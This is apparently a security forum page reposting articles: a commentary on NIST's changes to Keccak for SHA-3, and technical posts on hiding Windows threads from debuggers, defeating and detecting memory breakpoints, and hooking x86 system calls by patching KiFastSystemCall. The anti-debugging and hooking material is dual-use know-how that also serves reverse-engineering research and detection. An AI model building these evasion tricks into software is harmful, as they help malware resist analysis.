successor to the Secure Hash Standard document (FIPS Publication 180-4). Here’s where the controversy starts. One of the most accomplished civilian cryptographers, NIST’s John Kelsey, gave an invited talk at a conference in August, the Workshop on Cryptographic Hardware and Embedded Systems 2013 (CHES’13), where he described some of the changes NIST has made to Keccak in turning it into a standard. The changes were detailed in five slides (slides 44-48) of Kelsey’s slide deck for his talk. Two major changes puzzled some in attendance: In the name of increased performance (running faster in software and hardware), the security levels of Keccak were drastically reduced. The four versions of the winning Keccak algorithm had security levels of 224-bits, 256-bits, 384-bits, and 512-bits. However, from Kelsey’s slides, NIST intends to standardize only two versions, a 128-bit and a 256-bit version. Some of the internals of the algorithm had been tweaked by NIST – some in cooperation with the team that submitted Keccak – to improve performance and allow for new types of applications. Essentially, NIST had changed Keccak to something very different from what won the 5-year competition. Since this talk, cryptographers have been abuzz with this news and generally very critical of the changes (e.g., folks like Marsh Ray on Twitter). What are the issues with SHA-3 standardization? So, what’s the big deal? Well, the problems here cluster in five areas: Process: From a simple due process perspective, after a five-year hard-fought competition, to make large changes to the winning algorithm is simply problematic. The algorithm being standardized is very different from the winning Keccak, which beat 62 other high-powered cryptography research groups in a 5-year competition. (To be fair, it’s not like these changes came out of the blue. However, given the new political environment reality itself has changed.) No security improvement: The SHA-3 version of Keccak being proposed appears to provide essentially the same level of security guarantees as SHA-2, its predecessor. If we are going to develop a next generation hash, there certainly should be standardized versions that provide a higher security level than the older hash functions! NIST, in the original call for submissions, specifically asked for four versions in each submission, with at least two that would be stronger than what was currently available, so it’s hard to understand this post-competition weakening. Unclear implications of internal changes: The changes made to Keccak to get to SHA-3 may be so substantial as to render the cryptanalysis that was performed during the competition moot. That is, all the intense number crunching cryptographers performed during the competition to try and break the submitted ciphers to prove their strength/weakness simply doesn’t apply to the modified form of Keccak that NIST is working on. No real need for high-performance hashes: NIST said it weakened the security levels of the winning Keccak submission to boost performance. (Weaker versions of hash functions run faster.) However, there is not clearly a need for another fast hash algorithm. For example, to get exceedingly technical for a moment: in communications security, hashes are used for a few purposes and most are computed on small inputs – where performance isn’t a concern – and in cases where performance is a concern due to large inputs (e.g., with “message authentication codes” or MACs), many applications are moving away from hash-based MACs (HMAC) to other types of MACs like GMAC that are not based on hash functions. NIST’s reputation is undermined: Kelsey’s CHES’13 talk was given in mid-August, two weeks before the NSA encryption revelations. Those revelations suggest that NSA, through an intelligence program called BULLRUN actively worked to undermine NIST’s effort to standardize strong cryptography. NIST could not have known how the changes it made might appear once that reporting had cast a pall over NIST cryptographic standards setting. The changes made to Keccak undoubtedly weaken the algorithm, calling NIST’s motives into question in light of the NSA revelations (regardless of their actual intentions). None of this is irreversible. What could NIST do to defuse this controversy? Kelsey’s slides indicate that NIST is on track to standardize the NIST-modified version of Keccak as SHA-3 and issue a draft standard in late October for public comment. If the issues above are not addressed in that draft standard, there will be considerable hue and cry from the cryptographic community and it will only serve to reinforce the more general concerns about NIST’s cooperation with the NSA. It’s in no one’s interest to feed the flames of NIST scaremongering and we all have an interest in NIST as a trusted place for science and standardization. In that spirit, there are a number of things NIST can do to calm this storm (and please consider joining NIST’s Hash Forum to discuss this further): Add back high-security modes: NIST must ensure that SHA-3 has strong modes of operation. NIST should at least add back in a 512-bit security level version of Keccak so those users who want exceedingly high security and don’t worry as much about performance have a standardized mode that they can use. In fact, if NIST is worried about performance, it probably makes sense to standardize the as-submitted versions of Keccak (224, 256, 384, 512-bit security levels) and add in a much weaker but high-performance 128-bit version for those users who want to make that trade-off. This would be the “Kumbaya” solution, as it would have five security levels with both the NIST-modified versions and the as-submitted Keccak versions. Justify optimizations and internal changes: NIST has obviously made significant internal changes to the Keccak algorithm. This means that the NIST-modified Keccak and the winner of the SHA-3 competition are likely to be very different. To be sure, there are probably some very good reasons for the changes, but we don’t know what they are, and it would be unfortunate to learn them simply in the draft standard as published in October. Extensive changes should technically be subject to the cryptanalysis that was brought to bear during the actual competition. Unfortunately, it will be impossible to muster the cryptographic scrutiny necessary to examine the NIST-modified Keccak as the resources and teams that worked on this during the competition are no longer available. Here, it makes sense for NIST to standardize both the winning version of Keccak and NIST’s optimized version (“SHA-3-Opt” maybe?), so that implementers can have their pick of whether they want the Keccak that was subject to the grueling competition or an improved version that hasn’t been subject to as much scrutiny. Improve the standardization process: No one doubts that NIST runs high-quality cryptographic competitions. The many-year competitions that resulted in AES (the Advanced Encryption Standard) and SHA-3 marshaled the most gifted cryptographic thinkers in the world to shake down very exotic forms of mathematics to result in very strong, clever and useful practical outcomes. The resulting algorithms look indistinguishable from magic to many of us who are not steeped in the fine art of cryptography. However, the process of getting from the algorithm that won the competition to a standard is a dark and mysterious process, and it need not be. While the relationship between NSA and NIST has always made many of us uneasy, in light of recent revelations, it’s especially important that this standardization step be open and transparent with a formal process that works to ensure that all decisions are made in a well-documented manner and that conditions that ensured an algorithm withstood withering scrutiny during a competition do not subsequently change dramatically during the standardization process. At CDT, we work hard to make sure that standards processes serve the public interest in an open, free and innovative Internet. We’ll be advocating for changes in standards processes at NIST so that it remains an unbiased, trusted, and scientific venue for developing cybersecurity and cryptographic standards. UPDATE [2013-09-24T17:41:24]: Changed title to better reflect that SHA-3 is not an encryption standard but a hash function standard (without using "hash function" in the title). Better qualified that SHA-1 is likely weak in the face of government-level adversaries. Further update [2013-09-25T06:09:38]: clarified that SHA-1 is essentially on its way out. Sursa: https://www.cdt.org/blogs/joseph-lorenzo-hall/2409-nist-sha-3
  23. [h=3]Hidding Threads From Debuggers[/h]In this post i will take into discussion an old anti-debug trick that many of us know well. The trick is the ability of our code to hide specific threads from debuggers. This is usually achieved by calling the ntdll "ZwSetInformationThread" function with the "ThreadInformationClass" parameter set to ThreadHideFromDebugger 0x11. Sample code for this trick can be found here. If we take the "ZwSetInformationThread" function into disassembly, we can easily see that the "ThreadInformationLength" parameter must be zero for the function call to succeed, otherwise ERROR_BAD_LENGTH is returned. See image below. And here is the 64-bit version As you can see from the two images above, the whole function call ends up setting the "HideFromDebugger" bit of the "_ETHREAD" structure. Once this flag has been set, the kernel guarantees that the debugger will never receive any debug events from the corresponding thread. For example, let's take the LOAD_DLL_DEBUG_EVENT events. As you know, any time a module is loaded into the address space of specific process, the debugger is notified of this action through the LOAD_DLL_DEBUG_EVENT events.The debugger then inspects various interesting fields in the "LOAD_DLL_DEBUG_INFO" structure e.g. ImageBase. Depending on the debugger configuration, the debugger notifies you of that or not. You can see this if you instruct OllyDbg to break on new module. The two images above show how OllyDbg acts if a normal (not hidden) thread loads a new DLL. It is as follows: 1) Thread Loads a new DLL via calling e.g. the "LoadLibrary" function. 2) The "LoadLibrary" function wraps up a call to the ntdll "ZwMapViewOfSection" function. 3) The kernel mode part of ZwMapViewOfSection calls the "DbgkMapViewOfSection" function. 4) The "DbgkMapViewOfSection" functionqueries both the "HideFromDebugger" bit of the "_ETHREAD" structure and the value of the "DebugPort" field of the "_EPROCESS" structure. If the "HideFromDebugger" bit is not set and the "DebugPort" field is set, then the function builds the "LOAD_DLL_DEBUG_INFO" structure and calls the "DbgkpSendApiMessage" function which is responsible for delivering the debug event to the attached debugger. On the other side, if the "HideFromDebugger" bit is set, DbgkMapViewOfSection returns immediately without delivering the debug event. See images below. N.B. Regarding the UN/LOAD_DLL_DEBUG_EVENT's, there are other factors that determine whether or not the debug event is going to be delivered to debugger e.g. the "SuppressDebugMsg" bit of the Thread Environment Block (TEB). 5) In the debugger, the "WaitForDebugEvent" function returns with the "dwDebugEventCode" field set to LOAD_DLL_DEBUG_EVENT 0x6. Given this, the debugger figures out that a new module has just been loaded and that it should inspect the "LOAD_DLL_DEBUG_INFO" structure to extract the new image base, file handle, etc. 6) After extracting info. from the "LOAD_DLL_DEBUG_INFO" structure, the debugger calls the "ContinueDebugEvent" function to continue executing the thread. Similar to LOAD_DLL_DEBUG_EVENT's, debuggers never get notified of exceptions raised in the scope of hidden threads. To ensure that let's have a look at the "DbgkForwardException" function. As you can see in the image above, the "HideFromDebugger" bit of the "_ETHREAD" structure is queried here as well. Conclusion: When the "HideFromDebugger" bit flag of the "_ETHREAD" structure is set, the thread will not receive any debug events. If we look again at the "NtSetInformationThread" function in disassembly, we will see that the function call is one-way i.e. you can make this function call to hide the thread from debugger but you can not make this call to un-hide the thread from debuggers. Let's have a look at the "ZwQueryInformationThread" function. As the name implies, we can usethisfunction to determine if a specific thread is hidden from debuggers. See below. And here is the 64-bit version. As you can see from the two images above, the "ThreadInformationLength" parameter must be one for this function call to succeed. If it is one as expected, nothing surprising is seen, the function just sets the first byte pointed to by the "ThreadInformation" parameter to one if the "HideFromDebugger" bit of the "_ETHREAD" structureis set. Given this knowledge, i have created a small OllyDbg v1.10 plugin to detect any hidden thread in the process being debugged esp. if we are attaching to an active process. The plugin is called HiddenThreads. You download it from here and its source code from here. Unfortunately, in older versions of Windows e.g. XP, the "ZwQueryInformationThread" function can't be used to detect if a thread is hidden from debuggers as the ThreadHideFromDebugger information class 0x11 is simply not implemented. The function call returns ERROR_INVALID_PARAMETER. Now that we have seen how to hide a thread from debuggers, how this works under the hood, and how to detect if a thread is hidden from debuggers, let's try to find another way to hide the thread other than calling the "ZwSetInformationThread" function. With the introduction of the "ZwCreateThreadEx" function e.g. Windows Vista and 7, a new flags parameter is present. This flag causes new threads to be created hidden from debuggers i.e. you don't need to call the "ZwSetInformationThread" function. If we set this parameter (the 7th parameter) to 0x4, then the new thread will be hidden from debuggers. In this case, setting the "HideFromDebugger" bit occurs in the "PspAllocateThread" function. See image below. You can find a demo here and its source code from here. This post was written based on debugging sessions on Windows 7 64-bit. This is why you see me switching from x86 to x64. Any comments or ideas are very welcome. You can follow me on Twitter @waleedassar Sursa: waliedassar: Hidding Threads From Debuggers
  24. [h=3]Defeating Memory Breakpoints[/h]In this post i will show you a couple of tricks that can be used to defeat memory breakpoints. First i should explain what memory breakpoints are and how they work. Anyone who has spent some time in the field of software protection and debuggers must have heard of Memory breakpoints. Actually, memory breakpoints were not extensively used in the past but since more and more protection schemes implement anti-INT3 and anti-Hardware breakpoints tricks, reverse engineers started to use memory breakpoints to avoid detection. The idea of memory breakpoints is so simple. Imagine that we want to place a memory breakpoint at address 0x402005 (On-Execution), what the debugger theoretically does is as follows: 1) Marks the memory page which the address 0x402005 belongs to (page 0x402000) as guarded via calling the "VirtualProtectEx" or "ZwProtectVirtualMemory" function with the "flNewProtect" parameter having the "PAGE_GUARD" protection attribute set. In this case page 0x402000 is originally PAGE_EXECUTE_READ 0x20 and after placing the memory breakpoint it becomes PAGE_EXECUTE_READ|PAGE_GUARD 0x120. 2) Each time the guarded page is touched whether read from, written to, or executes, then an exception STATUS_GUARD_PAGE_VIOLATION 0x80000001 is raised and the debugger receives a debug event of type EXCEPTION_DEBUG_EVENT. 3) The debugger then inspects various fields in the "EXCEPTION_RECORD" structure of the "DEBUG_EVENT" structure to determine the reason why the exception was raised. If the following conditions are met, then the debugger figures out that instruction at 0x402005 is about to execute i.e. breakpoint reached and that it should break accordingly. a) The "ExceptionCode" field is set to STATUS_GUARD_PAGE_VIOLATION 0x80000001. The "NumberParameters" field is greater than or equal to 2. c) The "ExceptionInformation[0]" field is set to 8. d) The "ExceptionInformation[1]" field is set to 0x402005. The image below represents something very similar. If any of the above mentioned conditions is not met, then the debugger figures out it is not the breakpoint. Whether the breakpoint is hit or not, the debugger resets the "PAGE_GUARD" protection attribute. Surprisingly, even though this is the typical way debuggers should implement memory breakpoints, OllyDbg and many other user-mode debuggers implement memory breakpoints in a slightly different way. Let's first take OllyDbg v1.10 and see how it implements memory breakpoints. If you already use OllyDbg v1.10, you should already know that it has only two kinds of memory breakpoints, On-Access and On-Write. On-Access memory breakpoints trigger anytime the page is touched and On-Write memory breakpoints trigger anytime the page is written to. Trying to reverse OllyDbg v1.10 to see how it implements each type, i found out that: 1) For On-Access memory breakpoints, they are implemented by marking the page that the breakpoint address belongs to as PAGE_NOACESS. PAGE_NOACCESS means that anytime the page is touched, an exception STATUS_ACCESS_VIOLATION is raised. The debugger then receives the debug event and inspects fields in the "EXCEPTION_RECORD" structure in a similar way to the conventional method mentioned above. 2) For On-Write memory breakpoints, they are implemented by depriving the page which the breakpoint address belongs to of the write access right via setting the "flNewProtect" parameter passed to the "VirtualProtectEx" function to PAGE_EXECUTE_READ. Every time the page is written to, an exception STATUS_ACCESS_VIOLATION is received. The debugger then receives the debug event and inspects fields in the "EXCEPTION_RECORD" structure in a similar way to the conventional method mentioned above. Here lies a bug in OllyDbg v1.10 since it assumes that the memory protection of any single page in the process address space can be turned into PAGE_EXECUTE_READ while this is not true for example memory page at 0x10000 can never be executable (Windows 7). After we have seen how memory breakpoints are implemented, i will show you two tricks that can be used as anti-memory-breakpoints. Trick 1) Given the knowledge above, we can conclude that in order to defeat memory breakpoints esp. those of type On-Execution, we should cause the "VirtualProtectEx" function to fail. How is that possible? By copying our code to a dynamically-allocated memory page whose page protection attributes can be executable and in the same time can not be guarded or no-access. This type of memory pages does really exist. For every thread you create, the kernel allocates one page (three pages in case of Wow64 processes) for the TEB. The TEB page(s) can't be non-writable and can't be assigned the "PAGE_GUARD" protection attribute. How can this be implemented? All you have to do to implement this trick is call the "CreateThread" function with the "dwCreationFlags" parameter set to CREATE_SUSPENDED. At this point, we have the new thread's TEB with the page protection attributes set to PAGE_READWRITE. The next thing we should do is make the TEB page executable by calling the "VirtualProtect" function with the "flNewProtect" parameter set to PAGE_EXECUTE_READWRITE. You can use this demo to test this trick. N.B. For more stealthy way to conceal the point at which the page protection is changed to executable, use the "VirtualAlloc" function instead of "VirtualProtect". The allocation type in this case must be MEM_COMMIT only. Trick 2) This trick can easily detect memory breakpoints. It relies on the fact that the "ReadProcessMemory" function returns false if you try to read guarded or no-access memory. To use this trick, all you have to do is call the "ReadProcessMemory" function with the "Handle" parameter set to 0xFFFFFFFF, the "lpBaseAddress" parameter set to the image base, and the "nSize" parameter set to the size of image. If it returns false, then at least one memory breakpoint is present. You can use this demo to test this trick. N.B. Certain executables have gap inaccessible pages e.g. those pages intended for anti-dumping described in a previous post. So you have to take care of that if implementing this trick. N.B. ReadProcessMemory has also been used as a stealthy way to read memory without triggering Hardware Breakpoints. Any comments or ideas are very welcome. You can follow me on Twitter @waleedassar Sursa: waliedassar: Defeating Memory Breakpoints
  25. [h=3]Native x86 User-mode System Calls Hooking[/h] In this post i am going to explain how to implement system call hooking from user-mode for native x86 processes (i here refer to 32-bit processes running in 32-bit versions of Windows XP SP2 and SP3). Let's have a look at the "ZwOpenProcess" function of Windows XP SP2 and of Windows XP SP3. 1) XP SP2 2) XP SP3 As you can see in the images above, EAX is set to 0x7A, the system call ordinal and EDX is made to point at 0x7FFE0300 in the _KUSER_SHARED_DATA page. Then comes a CALL instruction which jumps to the "KiFastSystemCall" function whose address is stored in 0x7FFE0300 (_KUSER_SHARED_DATA::SystemCall). One difference we can see is that SYSENTER of XP SP2 is followed by 5 NOPs while in XP SP3 SYSENTER is directly followed by the RET of the "KiFastSystemCallRet" function. The first thing one may think of to implement the user-mode system call hook in Windows XP SP3/SP2 is to overwrite the "_KUSER_SHARED_DATA::SystemCall" and "_KUSER_SHARED_DATA::SystemCallRet" fields. Unfortunately, this is not possible since the page is not writable and any attempt to change its memory protection constant always fails. So, we should now turn to the "KiFastSystemCall" function and try to overwrite its very first instruction with a JMP instruction. Is this all? Let's see. For XP SP2, it is okay to write a near jmp instruction (5-byte long) since we have enough space (filled with 5 NOPs) and this does not hurt the RET instruction of the "KiFastSystemCallRet" function. But for XP SP3, any attempt to write the near jmp instruction will hurt the "KiFastSystemCallRet" function. Any common method for both XP SP2 and SP3? I thought about that and came up with something that worked for both service packs. If we allocate a memory page at an address which when converted from absolute to relative gives 0xC3 as the fifth byte of the new JMP instruction. For example, if we allocate a memory page at 0x3F910000, given that the "KiFastSystemCall" function is at 0x7C90E510, we get the new JMP instruction as a sequence of "\xE9\xEB\x1A\x00\xC3". You can check the source code of InjectHookLib for more information. N.B. We can still use a short JMP by searching for any vacant 5 bytes in the range of -128 to +127 from the address of the "KiFastSystemCall" function. LEA ESP,[ESP] seems to be okay for both service packs. N.B. With certain processors or under certain conditions e.g. disabled VT-x/AMD-V if using VirtualBox, the "KiFastSystemCall" function is not used at all and the "KiIntSystemCall" is used instead. In these cases, you can safely overwrite the first instructions of "KiIntSystemCall" function with a near JMP instruction as long as the code you hook to takes care of that. Any ideas or suggestions are always very welcome. You can follow me @waleedassar Posted by waliedassar Sursa: waliedassar: Native x86 User-mode System Calls Hooking
×
×
  • Create New...